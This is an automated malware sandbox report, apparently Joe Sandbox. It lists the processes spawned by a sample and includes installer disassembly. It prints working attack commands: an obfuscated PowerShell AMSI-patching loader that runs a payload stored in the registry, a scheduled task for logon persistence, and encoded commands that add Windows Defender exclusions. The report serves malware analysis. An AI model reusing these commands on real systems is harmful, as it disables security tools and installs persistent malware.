@([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0xdd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:24
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:25
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:26
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:27
                          Start time:01:41:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:28
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:29
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
                          Imagebase:0x7ff71aea0000
                          File size:226816 bytes
                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:30
                          Start time:01:41:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x20000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 77%, ReversingLabs

                          General

                          Target ID:31
                          Start time:01:41:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7fc480000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:32
                          Start time:01:41:49
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:33
                          Start time:01:41:50
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0xfa0000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:36
                          Start time:01:42:09
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:37
                          Start time:01:42:10
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7748d0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:38
                          Start time:01:42:11
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:39
                          Start time:01:42:19
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dllhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
                          Imagebase:0x7ff6535c0000
                          File size:20888 bytes
                          MD5 hash:2528137C6745C4EADD87817A1909677E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:42
                          Start time:01:42:25
                          Start date:27/03/2022
                          Path:C:\Windows\System32\winlogon.exe
                          Wow64 process (32bit):false
                          Commandline:winlogon.exe
                          Imagebase:0x7ff775840000
                          File size:677376 bytes
                          MD5 hash:F9017F2DC455AD373DF036F5817A8870
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:43
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:44
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\lsass.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\lsass.exe
                          Imagebase:0x7ff765a60000
                          File size:57976 bytes
                          MD5 hash:317340CD278A374BCEF6A30194557227
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:45
                          Start time:01:42:34
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:46
                          Start time:01:42:35
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:47
                          Start time:01:42:37
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:49
                          Start time:01:42:40
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:50
                          Start time:01:42:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dwm.exe
                          Wow64 process (32bit):false
                          Commandline:dwm.exe
                          Imagebase:0x7ff7aa950000
                          File size:62464 bytes
                          MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:13.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.6%
                            Total number of Nodes:1340
                            Total number of Limit Nodes:17
                            execution_graph 2912 4015c1 2932 402da6 2912->2932 2916 4015d1 2917 401631 2916->2917 2928 401617 GetFileAttributesW 2916->2928 2930 4015fa 2916->2930 2944 405e39 2916->2944 2952 405b08 2916->2952 2960 405aeb CreateDirectoryW 2916->2960 2919 401663 2917->2919 2920 401636 2917->2920 2922 401423 24 API calls 2919->2922 2948 401423 2920->2948 2929 40165b 2922->2929 2927 40164a SetCurrentDirectoryW 2927->2929 2928->2916 2930->2916 2955 405a6e CreateDirectoryW 2930->2955 2933 402db2 2932->2933 2963 40657a 2933->2963 2936 4015c8 2938 405eb7 CharNextW CharNextW 2936->2938 2939 405ed4 2938->2939 2941 405ee6 2938->2941 2939->2941 2942 405ee1 CharNextW 2939->2942 2940 405f0a 2940->2916 2941->2940 2943 405e39 CharNextW 2941->2943 2942->2940 2943->2941 2945 405e3f 2944->2945 2946 405e55 2945->2946 2947 405e46 CharNextW 2945->2947 2946->2916 2947->2945 3001 40559f 2948->3001 2951 40653d lstrcpynW 2951->2927 3012 40690a GetModuleHandleA 2952->3012 2956 405abb 2955->2956 2957 405abf GetLastError 2955->2957 2956->2930 2957->2956 2958 405ace SetFileSecurityW 2957->2958 2958->2956 2959 405ae4 GetLastError 2958->2959 2959->2956 2961 405afb 2960->2961 2962 405aff GetLastError 2960->2962 2961->2916 2962->2961 2967 406587 2963->2967 2964 4067aa 2965 402dd3 2964->2965 2996 40653d lstrcpynW 2964->2996 2965->2936 2980 4067c4 2965->2980 2967->2964 2968 406778 lstrlenW 2967->2968 2971 40657a 10 API calls 2967->2971 2972 40668f GetSystemDirectoryW 2967->2972 2974 4066a2 GetWindowsDirectoryW 2967->2974 2975 406719 lstrcatW 2967->2975 2976 40657a 10 API calls 2967->2976 2977 4067c4 5 API calls 2967->2977 2978 4066d1 SHGetSpecialFolderLocation 2967->2978 2989 40640b 2967->2989 2994 406484 wsprintfW 2967->2994 2995 40653d lstrcpynW 2967->2995 2968->2967 2971->2968 2972->2967 2974->2967 2975->2967 2976->2967 2977->2967 2978->2967 2979 4066e9 SHGetPathFromIDListW CoTaskMemFree 2978->2979 2979->2967 2986 4067d1 2980->2986 2981 406847 2982 40684c CharPrevW 2981->2982 2984 40686d 2981->2984 2982->2981 2983 40683a CharNextW 2983->2981 2983->2986 2984->2936 2985 405e39 CharNextW 2985->2986 2986->2981 2986->2983 2986->2985 2987 406826 CharNextW 2986->2987 2988 406835 CharNextW 2986->2988 2987->2986 2988->2983 2997 4063aa 2989->2997 2992 40646f 2992->2967 2993 40643f RegQueryValueExW RegCloseKey 2993->2992 2994->2967 2995->2967 2996->2965 2998 4063b9 2997->2998 2999 4063c2 RegOpenKeyExW 2998->2999 3000 4063bd 2998->3000 2999->3000 3000->2992 3000->2993 3002 4055ba 3001->3002 3011 401431 3001->3011 3003 4055d6 lstrlenW 3002->3003 3004 40657a 17 API calls 3002->3004 3005 4055e4 lstrlenW 3003->3005 3006 4055ff 3003->3006 3004->3003 3007 4055f6 lstrcatW 3005->3007 3005->3011 3008 405612 3006->3008 3009 405605 SetWindowTextW 3006->3009 3007->3006 3010 405618 SendMessageW SendMessageW SendMessageW 3008->3010 3008->3011 3009->3008 3010->3011 3011->2951 3013 406930 GetProcAddress 3012->3013 3014 406926 3012->3014 3017 405b0f 3013->3017 3018 40689a GetSystemDirectoryW 3014->3018 3016 40692c 3016->3013 3016->3017 3017->2916 3019 4068bc wsprintfW LoadLibraryExW 3018->3019 3019->3016 3500 404943 3501 404953 3500->3501 3502 404979 3500->3502 3507 404499 3501->3507 3510 404500 3502->3510 3506 404960 SetDlgItemTextW 3506->3502 3508 40657a 17 API calls 3507->3508 3509 4044a4 SetDlgItemTextW 3508->3509 3509->3506 3511 4045c3 3510->3511 3512 404518 GetWindowLongW 3510->3512 3512->3511 3513 40452d 3512->3513 3513->3511 3514 40455a GetSysColor 3513->3514 3515 40455d 3513->3515 3514->3515 3516 404563 SetTextColor 3515->3516 3517 40456d SetBkMode 3515->3517 3516->3517 3518 404585 GetSysColor 3517->3518 3519 40458b 3517->3519 3518->3519 3520 404592 SetBkColor 3519->3520 3521 40459c 3519->3521 3520->3521 3521->3511 3522 4045b6 CreateBrushIndirect 3521->3522 3523 4045af DeleteObject 3521->3523 3522->3511 3523->3522 3524 401c43 3546 402d84 3524->3546 3526 401c4a 3527 402d84 17 API calls 3526->3527 3528 401c57 3527->3528 3529 401c6c 3528->3529 3530 402da6 17 API calls 3528->3530 3531 402da6 17 API calls 3529->3531 3535 401c7c 3529->3535 3530->3529 3531->3535 3532 401cd3 3534 402da6 17 API calls 3532->3534 3533 401c87 3536 402d84 17 API calls 3533->3536 3538 401cd8 3534->3538 3535->3532 3535->3533 3537 401c8c 3536->3537 3539 402d84 17 API calls 3537->3539 3540 402da6 17 API calls 3538->3540 3541 401c98 3539->3541 3542 401ce1 FindWindowExW 3540->3542 3543 401cc3 SendMessageW 3541->3543 3544 401ca5 SendMessageTimeoutW 3541->3544 3545 401d03 3542->3545 3543->3545 3544->3545 3547 40657a 17 API calls 3546->3547 3548 402d99 3547->3548 3548->3526 3549 4028c4 3550 4028ca 3549->3550 3551 4028d2 FindClose 3550->3551 3552 402c2a 3550->3552 3551->3552 3556 4016cc 3557 402da6 17 API calls 3556->3557 3558 4016d2 GetFullPathNameW 3557->3558 3559 4016ec 3558->3559 3565 40170e 3558->3565 3562 406873 2 API calls 3559->3562 3559->3565 3560 401723 GetShortPathNameW 3561 402c2a 3560->3561 3563 4016fe 3562->3563 3563->3565 3566 40653d lstrcpynW 3563->3566 3565->3560 3565->3561 3566->3565 3567 401e4e GetDC 3568 402d84 17 API calls 3567->3568 3569 401e60 GetDeviceCaps MulDiv ReleaseDC 3568->3569 3570 402d84 17 API calls 3569->3570 3571 401e91 3570->3571 3572 40657a 17 API calls 3571->3572 3573 401ece CreateFontIndirectW 3572->3573 3574 402638 3573->3574 3575 4045cf lstrcpynW lstrlenW 3576 402950 3577 402da6 17 API calls 3576->3577 3579 40295c 3577->3579 3578 402972 3581 406008 2 API calls 3578->3581 3579->3578 3580 402da6 17 API calls 3579->3580 3580->3578 3582 402978 3581->3582 3604 40602d GetFileAttributesW CreateFileW 3582->3604 3584 402985 3585 402a3b 3584->3585 3586 4029a0 GlobalAlloc 3584->3586 3587 402a23 3584->3587 3588 402a42 DeleteFileW 3585->3588 3589 402a55 3585->3589 3586->3587 3590 4029b9 3586->3590 3591 4032b4 31 API calls 3587->3591 3588->3589 3605 4034e5 SetFilePointer 3590->3605 3593 402a30 CloseHandle 3591->3593 3593->3585 3594 4029bf 3595 4034cf ReadFile 3594->3595 3596 4029c8 GlobalAlloc 3595->3596 3597 4029d8 3596->3597 3598 402a0c 3596->3598 3599 4032b4 31 API calls 3597->3599 3600 4060df WriteFile 3598->3600 3603 4029e5 3599->3603 3601 402a18 GlobalFree 3600->3601 3601->3587 3602 402a03 GlobalFree 3602->3598 3603->3602 3604->3584 3605->3594 3606 401956 3607 402da6 17 API calls 3606->3607 3608 40195d lstrlenW 3607->3608 3609 402638 3608->3609 3610 4014d7 3611 402d84 17 API calls 3610->3611 3612 4014dd Sleep 3611->3612 3614 402c2a 3612->3614 3615 404658 3616 404670 3615->3616 3622 40478a 3615->3622 3623 404499 18 API calls 3616->3623 3617 4047f4 3618 4048be 3617->3618 3619 4047fe GetDlgItem 3617->3619 3624 404500 8 API calls 3618->3624 3620 404818 3619->3620 3621 40487f 3619->3621 3620->3621 3628 40483e SendMessageW LoadCursorW SetCursor 3620->3628 3621->3618 3629 404891 3621->3629 3622->3617 3622->3618 3625 4047c5 GetDlgItem SendMessageW 3622->3625 3626 4046d7 3623->3626 3627 4048b9 3624->3627 3648 4044bb EnableWindow 3625->3648 3631 404499 18 API calls 3626->3631 3652 404907 3628->3652 3634 4048a7 3629->3634 3635 404897 SendMessageW 3629->3635 3632 4046e4 CheckDlgButton 3631->3632 3646 4044bb EnableWindow 3632->3646 3634->3627 3639 4048ad SendMessageW 3634->3639 3635->3634 3636 4047ef 3649 4048e3 3636->3649 3639->3627 3641 404702 GetDlgItem 3647 4044ce SendMessageW 3641->3647 3643 404718 SendMessageW 3644 404735 GetSysColor 3643->3644 3645 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3643->3645 3644->3645 3645->3627 3646->3641 3647->3643 3648->3636 3650 4048f1 3649->3650 3651 4048f6 SendMessageW 3649->3651 3650->3651 3651->3617 3655 405b63 ShellExecuteExW 3652->3655 3654 40486d LoadCursorW SetCursor 3654->3621 3655->3654 3656 4020d8 3657 4020ea 3656->3657 3658 40219c 3656->3658 3659 402da6 17 API calls 3657->3659 3660 401423 24 API calls 3658->3660 3661 4020f1 3659->3661 3667 4022f6 3660->3667 3662 402da6 17 API calls 3661->3662 3663 4020fa 3662->3663 3664 402110 LoadLibraryExW 3663->3664 3665 402102 GetModuleHandleW 3663->3665 3664->3658 3666 402121 3664->3666 3665->3664 3665->3666 3676 406979 3666->3676 3670 402132 3673 401423 24 API calls 3670->3673 3674 402142 3670->3674 3671 40216b 3672 40559f 24 API calls 3671->3672 3672->3674 3673->3674 3674->3667 3675 40218e FreeLibrary 3674->3675 3675->3667 3681 40655f WideCharToMultiByte 3676->3681 3678 406996 3679 40699d GetProcAddress 3678->3679 3680 40212c 3678->3680 3679->3680 3680->3670 3680->3671 3681->3678 3682 402b59 3683 402b60 3682->3683 3684 402bab 3682->3684 3687 402d84 17 API calls 3683->3687 3690 402ba9 3683->3690 3685 40690a 5 API calls 3684->3685 3686 402bb2 3685->3686 3688 402da6 17 API calls 3686->3688 3689 402b6e 3687->3689 3691 402bbb 3688->3691 3692 402d84 17 API calls 3689->3692 3691->3690 3693 402bbf IIDFromString 3691->3693 3695 402b7a 3692->3695 3693->3690 3694 402bce 3693->3694 3694->3690 3700 40653d lstrcpynW 3694->3700 3699 406484 wsprintfW 3695->3699 3698 402beb CoTaskMemFree 3698->3690 3699->3690 3700->3698 3701 40175c 3702 402da6 17 API calls 3701->3702 3703 401763 3702->3703 3704 40605c 2 API calls 3703->3704 3705 40176a 3704->3705 3705->3705 3706 401d5d 3707 402d84 17 API calls 3706->3707 3708 401d6e SetWindowLongW 3707->3708 3709 402c2a 3708->3709 3710 4056de 3711 405888 3710->3711 3712 4056ff GetDlgItem GetDlgItem GetDlgItem 3710->3712 3714 405891 GetDlgItem CreateThread CloseHandle 3711->3714 3715 4058b9 3711->3715 3755 4044ce SendMessageW 3712->3755 3714->3715 3717 4058e4 3715->3717 3719 4058d0 ShowWindow ShowWindow 3715->3719 3720 405909 3715->3720 3716 40576f 3724 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3716->3724 3718 405944 3717->3718 3721 4058f8 3717->3721 3722 40591e ShowWindow 3717->3722 3718->3720 3732 405952 SendMessageW 3718->3732 3757 4044ce SendMessageW 3719->3757 3723 404500 8 API calls 3720->3723 3758 404472 3721->3758 3728 405930 3722->3728 3729 40593e 3722->3729 3727 405917 3723->3727 3730 4057e4 3724->3730 3731 4057c8 SendMessageW SendMessageW 3724->3731 3733 40559f 24 API calls 3728->3733 3734 404472 SendMessageW 3729->3734 3735 4057f7 3730->3735 3736 4057e9 SendMessageW 3730->3736 3731->3730 3732->3727 3737 40596b CreatePopupMenu 3732->3737 3733->3729 3734->3718 3739 404499 18 API calls 3735->3739 3736->3735 3738 40657a 17 API calls 3737->3738 3740 40597b AppendMenuW 3738->3740 3741 405807 3739->3741 3742 405998 GetWindowRect 3740->3742 3743 4059ab TrackPopupMenu 3740->3743 3744 405810 ShowWindow 3741->3744 3745 405844 GetDlgItem SendMessageW 3741->3745 3742->3743 3743->3727 3746 4059c6 3743->3746 3747 405833 3744->3747 3748 405826 ShowWindow 3744->3748 3745->3727 3749 40586b SendMessageW SendMessageW 3745->3749 3750 4059e2 SendMessageW 3746->3750 3756 4044ce SendMessageW 3747->3756 3748->3747 3749->3727 3750->3750 3751 4059ff OpenClipboard 